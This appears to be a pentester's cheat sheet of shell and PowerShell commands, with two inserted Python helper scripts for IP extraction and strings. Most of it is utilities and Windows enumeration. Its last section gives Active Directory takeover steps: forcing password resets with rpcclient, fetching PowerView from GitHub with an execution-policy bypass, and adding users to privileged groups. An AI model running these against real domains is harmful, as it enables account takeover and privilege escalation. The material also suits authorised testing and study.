Nice Commands

This is a grab-bag of command workarounds, mostly for restricted systems that lack certain tools or functionality.

Linux

# Pull out IP addresses (IPv4, IPv6, MAC) from text file
grep -hoE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b|\b([0-9a-fA-F]{1,4}:){3,}[0-9a-fA-F]{1,4}\b|\b[0-9a-fA-F]{0,4}::[0-9a-fA-F]{0,4}\b" * | sort -u
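As an added example (not from the original cheat sheet), a small Python 3 script that does the same extraction as the grep one-liner above but validates each regex hit with the standard ipaddress module and keeps MAC addresses apart from IPv6: an out-of-range octet such as 999.1.1.1, a version string such as 1.2.3.4.5 or a log timestamp such as 12:00:01 is not reported. The sample log lines are constructed; pass file paths as arguments to scan real files.

```python
"""Extract and classify IPv4, IPv6 and MAC addresses from free text."""
import ipaddress
import re

# Constructed sample input (not from the original page): a few log-like lines,
# including values that look like addresses but are not.
SAMPLE_TEXT = """\
Jan 10 12:00:01 fw kernel: SRC=192.168.1.10 DST=10.0.0.5 MAC=00:11:22:33:44:55
Jan 10 12:00:02 fw sshd[123]: Accepted publickey from 2001:db8::1 port 2222
bogus candidate 999.1.1.1, version string 1.2.3.4.5, link-local fe80::1%eth0
"""

# Candidate patterns. The lookarounds stop a match from starting or ending
# inside a longer dotted or colon-separated token (version numbers, timestamps).
MAC_RE = re.compile(r"\b(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}\b")
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
IPV6_RE = re.compile(
    r"(?<![0-9A-Fa-f:.])(?:[0-9A-Fa-f]{0,4}:){2,7}[0-9A-Fa-f]{0,4}(?![0-9A-Fa-f:])"
)


def extract_addresses(text):
    """Return {'ipv4': [...], 'ipv6': [...], 'mac': [...]} with sorted, unique,
    validated values. Regex hits are only candidates; ipaddress does the real
    validation, so 999.1.1.1 or a timestamp like 12:00:01 is dropped."""
    macs = {m.group(0).lower().replace("-", ":") for m in MAC_RE.finditer(text)}
    # A MAC also satisfies the IPv6 candidate pattern, so blank MACs out first.
    without_macs = MAC_RE.sub(" ", text)

    ipv4, ipv6 = set(), set()
    for pattern, bucket, version in ((IPV4_RE, ipv4, 4), (IPV6_RE, ipv6, 6)):
        for m in pattern.finditer(without_macs):
            try:
                addr = ipaddress.ip_address(m.group(0))
            except ValueError:
                continue  # looked like an address, was not one
            if addr.version == version:
                bucket.add(str(addr))  # canonical (compressed) form
    return {"ipv4": sorted(ipv4), "ipv6": sorted(ipv6), "mac": sorted(macs)}


if __name__ == "__main__":
    import sys

    # Usage: python3 extract_ips.py [FILE ...]; with no files the sample is scanned.
    text = SAMPLE_TEXT if len(sys.argv) < 2 else "".join(
        open(p, errors="replace").read() for p in sys.argv[1:]
    )
    for kind, values in extract_addresses(text).items():
        print(kind, *values)
```

The grep one-liner is still the quicker option on a box that has grep; the script is for triage where you need the candidates filtered and classified before feeding them to a blocklist or a lookup.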

# Unzip w/ Python3
python3 -c 'import zipfile, sys; zip_ref = zipfile.ZipFile(sys.argv[1], "r"); zip_ref.extractall("."); zip_ref.close()' <ZIPFILE>

# Unzip w/ Perl
perl -e 'use Archive::Zip; my $zip = Archive::Zip->new(shift); $zip->extractTree();' <ZIPFILE>

# strings replacement (when the strings binary is missing; runs of 4+ printable chars, like strings -n 4)
f="<FILE>" ; tr -c '[:print:]\t\n' '[\n*]' < "$f" | awk 'length > 3' | less

# strings replacement, sed variant
f="<FILE>" ; sed 's/[^[:print:]]/\n/g' "$f" | awk 'length > 3' | less
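Both pipelines above work on the file as text, one line at a time. As an added example (not part of the original page), here is a byte-oriented Python 3 equivalent of strings -n 4 that also finds UTF-16LE strings (what strings -e l reports), which the tr and sed pipelines silently miss because every second byte is a NUL. The sample blob is constructed; pass a file path to scan a real binary.

```python
"""Minimal strings(1) replacement in Python 3 for hosts without the binary."""
import re
import sys

# Constructed sample blob (not from the page): an ELF-like header, two ASCII
# strings, short fragments, and one UTF-16LE string that byte-wise scanning misses.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00\x00"
    + b"/lib64/ld-linux-x86-64.so.2\x00"
    + b"ab\x00"
    + b"GCC: (GNU) 12.2\x00\x01"
    + "secret".encode("utf-16-le")
    + b"\x00\x00"
)

# Printable ASCII (space..tilde) plus tab; newline is deliberately excluded so
# multi-line text comes out as separate strings, as strings(1) does.
PRINTABLE = rb"[\x20-\x7e\t]"


def strings(data, min_len=4):
    """Runs of at least min_len printable ASCII bytes (like `strings -n min_len`)."""
    pattern = PRINTABLE + b"{%d,}" % min_len
    return [m.group(0).decode("ascii") for m in re.finditer(pattern, data)]


def strings_utf16le(data, min_len=4):
    """Runs of printable ASCII stored as UTF-16LE, i.e. each char followed by a
    NUL byte (like `strings -e l`); common in Windows binaries and registry hives."""
    pattern = b"(?:" + PRINTABLE + rb"\x00){%d,}" % min_len
    return [m.group(0).decode("utf-16-le") for m in re.finditer(pattern, data)]


if __name__ == "__main__":
    # Usage: python3 strings.py [FILE]; without a file the constructed blob is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for s in strings(data):
        print(s)
    for s in strings_utf16le(data):
        print("utf16:", s)
```

The whole file is read into memory, which is fine for the binaries and memory fragments you would normally run strings over on a restricted host; for very large images, read in chunks with an overlap of min_len bytes.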

---

# Map drive
sudo apt install -y cifs-utils
sudo mkdir /mnt/<SHARE>
sudo mount -t cifs -o username=<USERNAME>,password=<PASSWORD>,domain=. //<TARGET>/<SHARE> /mnt/<SHARE>
sudo mount -t cifs -o credentials=credentialfile //<TARGET>/<SHARE> /mnt/<SHARE>
# credentialfile
username=<USERNAME>
password=<PASSWORD>
domain=.

# Search filenames (quote the glob so the shell does not expand it first)
find <PATH> -name "*<KEYWORD>*"

# Search keyword in files (recursive, case-insensitive, with line numbers)
grep -rn -i -e "<KEYWORD>" <PATH>

Convert old SSH Key format RSA->OPENSSH

for key in *id_rsa; do ssh-keygen -p -f "$key" -N "" -o ; done

Windows

# Get PS Version
$PSVersionTable

---

# Processes or Task List
tasklist /V | findstr <KEYWORD>

# Current User Info
whoami;hostname
whoami /priv          # Show current user's privileges
whoami /groups        # Show current user's group memberships

# List Users & Groups
net user              # List all local users
net localgroup        # List all local groups
net localgroup | findstr admin
net localgroup "<GROUP>"
net localgroup administrators  # List members of the Administrators group

# Password & Account Policy
net accounts          # (Local policy)
net accounts /domain  # (Domain policy)

# Shares
net share             # Shares served by this computer
net use               # Remote shares connected in the current session
Get-SmbMapping        # Same as net use, in PowerShell
Get-PSDrive -PSProvider FileSystem

# Map drive
net use <DRIVE>: \\<TARGET>\<SHARE>
net use <DRIVE>: \\<TARGET>\<SHARE> /user:<USER> <PASSWORD>

# Map drive
New-PSDrive -PSProvider "FileSystem" -Name "<DRIVE>" -Root "\\<TARGET>\<SHARE>"
$secpassword = ConvertTo-SecureString -AsPlainText -Force '<PASSWORD>'
$cred = New-Object System.Management.Automation.PSCredential '<USERNAME>', $secpassword
New-PSDrive -PSProvider "FileSystem" -Credential $cred -Name "<DRIVE>" -Root "\\<TARGET>\<SHARE>"

# Search filenames
dir /s /b <DRIVE>:\*<KEYWORD>*
Get-ChildItem -Recurse -File -Path <DRIVE>:\ -Include *<KEYWORD>*

# Search keyword in files
findstr /s /i <KEYWORD> <DRIVE>:\*.*
Get-ChildItem -Recurse -File -Path <DRIVE>:\ | Select-String -Pattern "<KEYWORD>"

Change User Password

via rpcclient with ForceChangePassword perm

This will only work without the user’s old password if the authenticating user has the ForceChangePassword permission at the domain level (or obviously if the user is a Domain Administrator):

rpcclient -U '<DOMAIN>/<USER>%<PASSWORD>' <DC_IP> -c "setuserinfo2 <USER_TO_CHANGE> 23 '<NEW_PASSWORD>'"

via PowerView

Import PowerView:

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
Import-Module .\PowerView.ps1

If needed, authenticate as a privileged user first:

$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)

Then create and set the new password for the other account:

$newPassword = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force

Set-DomainUserPassword -Identity <USER> -AccountPassword $newPassword -Credential $Cred -Verbose

Alternatively, grant that user more permissions through group membership:

# Get Group SID
# $group = (Get-DomainGroup "<GROUP>" -Server <DC_IP> -Credential $Cred).objectsid

# Add User to Group
Add-DomainGroupMember -Identity "<GROUP>" -Members '<USER>' -Domain <DOMAIN> -Credential $Cred -Verbose

# Remove User from Group
Remove-DomainGroupMember -Identity "<GROUP>" -Members '<USER>' -Domain <DOMAIN> -Credential $Cred -Verbose

# Verify Group Membership or Removal
Get-DomainGroupMember -Identity "<GROUP>" -Server <DC_IP> -Credential $Cred | Select MemberName